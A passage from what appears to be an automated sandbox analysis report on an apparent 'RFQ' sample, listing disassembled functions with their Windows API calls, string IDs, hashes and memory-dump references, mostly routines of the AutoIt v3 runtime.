                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079787B
                                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007978A1
                                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 007978B6
                                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007978C9
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 007978E9
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00797904
                                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00797918
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00797930
                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00797956
                                                                                                                                                    • GetMonitorInfoW.USER32 ref: 00797970
                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00797987
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 007979F2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                    • Opcode ID: ad3233ae95e7f17990db957645dbc7eac2309aceb9bf7299a45939d661b3e728
                                                                                                                                                    • Instruction ID: 4e13f0832a6ac914800b335984d2854edbfc11ec82169dcf9efde2e306991959
                                                                                                                                                    • Opcode Fuzzy Hash: ad3233ae95e7f17990db957645dbc7eac2309aceb9bf7299a45939d661b3e728
                                                                                                                                                    • Instruction Fuzzy Hash: 76B18F71618301AFDB18DF64D889B5ABBE4FF88310F00891DF5999B291D778EC04CB95
                                                                                                                                                    Function 00776CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00776CFB
                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00776D21
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00776D4F
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00776D5A
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776D70
                                                                                                                                                    • _wcsstr.LIBCMT ref: 00776D7B
                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00776D97
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776DE0
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776DE7
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00776E12
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                                                    • Opcode ID: cd6af3e95397fada2bfb476212eedb7b3abb67d65858959d9ad3fb34811049ba
                                                                                                                                                    • Instruction ID: c4350145e543b408bdc25498679134932ff0edb3217b5085fd923c8acb4bfa30
                                                                                                                                                    • Opcode Fuzzy Hash: cd6af3e95397fada2bfb476212eedb7b3abb67d65858959d9ad3fb34811049ba
                                                                                                                                                    • Instruction Fuzzy Hash: E341D372600200BBEB10AB648C4BEFF776CEF45751F044169FD05A2182FFBC9A0596B5
                                                                                                                                                    Function 0074A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0074A939
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 0074A941
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0074A96C
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0074A974
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0074A999
                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0074A9B6
                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0074A9C6
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0074A9F9
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0074AA0D
                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0074AA2B
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 0074AA47
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0074AA52
                                                                                                                                                      • Part of subcall function 0074B63C: GetCursorPos.USER32(000000FF), ref: 0074B64F
                                                                                                                                                      • Part of subcall function 0074B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0074B66C
                                                                                                                                                      • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000001), ref: 0074B691
                                                                                                                                                      • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000002), ref: 0074B69F
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,0074AB87), ref: 0074AA79
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                    • Opcode ID: 8fa4d5d4906fe8409e26d33c624a5ecbf13e90bcdd22ad6a8f8e6149d33c8a1d
                                                                                                                                                    • Instruction ID: ff4ce0691647f84380673adf8f6f7e2dc2c718683837dab0b0bc9463efe179c9
                                                                                                                                                    • Opcode Fuzzy Hash: 8fa4d5d4906fe8409e26d33c624a5ecbf13e90bcdd22ad6a8f8e6149d33c8a1d
                                                                                                                                                    • Instruction Fuzzy Hash: DFB14C7164020AEFDB24DFA8DC45BAE7BB4FB48314F118229FA15E6290DB78EC40CB55
                                                                                                                                                    Function 00793639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00793735
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,007CDC00,00000000,?,00000000,?,?), ref: 007937A3
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007937EB
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00793874
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00793B94
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00793BA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                                                    • Opcode ID: 97dffc4310ba8a4cb1b8b472dc5079c77d34b0b856c0c08496dacf209d360ef5
                                                                                                                                                    • Instruction ID: 35fce3439f79a3c97d92f245d8fd94990d71840e9887560d96118fc8dfc5483a
                                                                                                                                                    • Opcode Fuzzy Hash: 97dffc4310ba8a4cb1b8b472dc5079c77d34b0b856c0c08496dacf209d360ef5
                                                                                                                                                    • Instruction Fuzzy Hash: 2A025AB5604601DFDB14EF14D889E2AB7E5FF88720F05845CF94A9B2A2DB78ED01CB81
                                                                                                                                                    Function 00796BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00796C56
                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00796D16
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                    • API String ID: 3974292440-719923060
                                                                                                                                                    • Opcode ID: 65defc3785c5ee39e6cdd76d6c9209a33132cf371a8417d692990c39cbcb17d0
                                                                                                                                                    • Instruction ID: d83ce442d721d57533ccc983470187f87e414845db7c5a7f37b0f7471330c7b9
                                                                                                                                                    • Opcode Fuzzy Hash: 65defc3785c5ee39e6cdd76d6c9209a33132cf371a8417d692990c39cbcb17d0
                                                                                                                                                    • Instruction Fuzzy Hash: 52A18D70604245DBCF14EF20D895A6AB3A6BF44314F104A6DB8A6AB3D2DB3CED06CB51
                                                                                                                                                    Function 0076CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0076CF91
                                                                                                                                                    • __swprintf.LIBCMT ref: 0076D032
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D045
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0076D09A
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D0D6
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0076D10D
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0076D15F
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0076D195
                                                                                                                                                    • GetParent.USER32(?), ref: 0076D1B3
                                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 0076D1BA
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0076D234
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D248
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0076D26E
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D282
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                    • String ID: %s%u
                                                                                                                                                    • API String ID: 3119225716-679674701
                                                                                                                                                    • Opcode ID: d3caa05266e42afb2dde7c3e3a397b00c58c3d1be7a191d6eed1b09a82bc2976
                                                                                                                                                    • Instruction ID: 66d481da28db24b2292ed0b01a7ff68ddaea6464b9868615e4a4d1de32a6670c
                                                                                                                                                    • Opcode Fuzzy Hash: d3caa05266e42afb2dde7c3e3a397b00c58c3d1be7a191d6eed1b09a82bc2976
                                                                                                                                                    • Instruction Fuzzy Hash: 84A1DF71A14206AFD725DF64C894FEAB7A8FF48354F008619FD9AD2040EB38ED05CB91
                                                                                                                                                    Function 0076D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0076D8EB
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D8FC
                                                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0076D924
                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0076D941
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D95F
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0076D970
                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0076D9A8
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076D9B8
                                                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0076D9DF
                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0076DA28
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076DA38
                                                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0076DA60
                                                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0076DAC9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                                                    • Opcode ID: ac567a49f6c74c405ad404ef430d0e5510743322002fd49ba072a713ac5e7d38
                                                                                                                                                    • Instruction ID: 5b5d6d299694db7dec5d6fa6c4c9d272a4deb995a84e283965c01daab5a2b966
                                                                                                                                                    • Opcode Fuzzy Hash: ac567a49f6c74c405ad404ef430d0e5510743322002fd49ba072a713ac5e7d38
                                                                                                                                                    • Instruction Fuzzy Hash: 328108716183459FDB21CF50C885FAA7BE8FF44314F048469FD8A9A096EB38ED45CBA1
                                                                                                                                                    Function 0076D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                                                    • Opcode ID: 2653f5bd21cbc62cc09fa749faac93ed057def4f697686621307081c10c63495
                                                                                                                                                    • Instruction ID: 08b1eb108d963e17e484f96a8ef7651a8b423cc4a3072b665d703fce032c4054
                                                                                                                                                    • Opcode Fuzzy Hash: 2653f5bd21cbc62cc09fa749faac93ed057def4f697686621307081c10c63495
                                                                                                                                                    • Instruction Fuzzy Hash: 493194B1A44249E6EB24EA51DD5BEEDB3B95F24711F300029F842720E3FF9DAE05C652
                                                                                                                                                    Function 0076EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 0076EAB0
                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0076EAC2
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0076EAD9
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0076EAEE
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0076EAF4
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0076EB04
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0076EB0A
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0076EB2B
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0076EB45
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0076EB4E
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0076EBB9
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0076EBBF
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0076EBC6
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0076EC12
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0076EC1F
                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0076EC44
                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0076EC6F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3869813825-0
                                                                                                                                                    • Opcode ID: 67d32585984803421b213e57e55674ef4123b718821e28b466c3af8098affe7e
                                                                                                                                                    • Instruction ID: cf704769a4d17b14420dc7ebf1c100a6993ddc1794d8c4bc8c95e7a43c1d9fec
                                                                                                                                                    • Opcode Fuzzy Hash: 67d32585984803421b213e57e55674ef4123b718821e28b466c3af8098affe7e
                                                                                                                                                    • Instruction Fuzzy Hash: 0C513D75900709EFDB219FA8CD89F6EBBB5FF04704F004A28E987A25A0D778A944CB14
                                                                                                                                                    Function 007879B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 007879C6
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 007879D1
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 007879DC
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 007879E7
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 007879F2
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 007879FD
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00787A08
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00787A13
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00787A1E
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00787A29
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00787A34
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00787A3F
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00787A4A
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00787A55
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00787A60
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00787A6B
                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00787A7B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2577412497-0
                                                                                                                                                    • Opcode ID: bec6624649bca7664b32ec884f4b2e887e9f472137b6015fe3e05f11a544e139
                                                                                                                                                    • Instruction ID: bc6f90ab0539fbc296c20e96b1ef89c3b6bd1463281e4c004cab7eb4fc347052
                                                                                                                                                    • Opcode Fuzzy Hash: bec6624649bca7664b32ec884f4b2e887e9f472137b6015fe3e05f11a544e139
                                                                                                                                                    • Instruction Fuzzy Hash: 743129B0D4831A6ADB109FBA8C8995FBFE8FF04750F504526E50DE7280DA7CA500CFA1
                                                                                                                                                    Function 0073C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0073C8B7,?,00002000,?,?,00000000,?,0073419E,?,?,?,007CDC00), ref: 0074E984
                                                                                                                                                      • Part of subcall function 0073660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007353B1,?,?,007361FF,?,00000000,00000001,00000000), ref: 0073662F
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0073C93E
                                                                                                                                                      • Part of subcall function 00751DFC: __wsplitpath_helper.LIBCMT ref: 00751E3C
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0073C953
                                                                                                                                                    • _wcscat.LIBCMT ref: 0073C968
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0073C978
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0073CABE
                                                                                                                                                      • Part of subcall function 0073B337: _wcscpy.LIBCMT ref: 0073B36F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
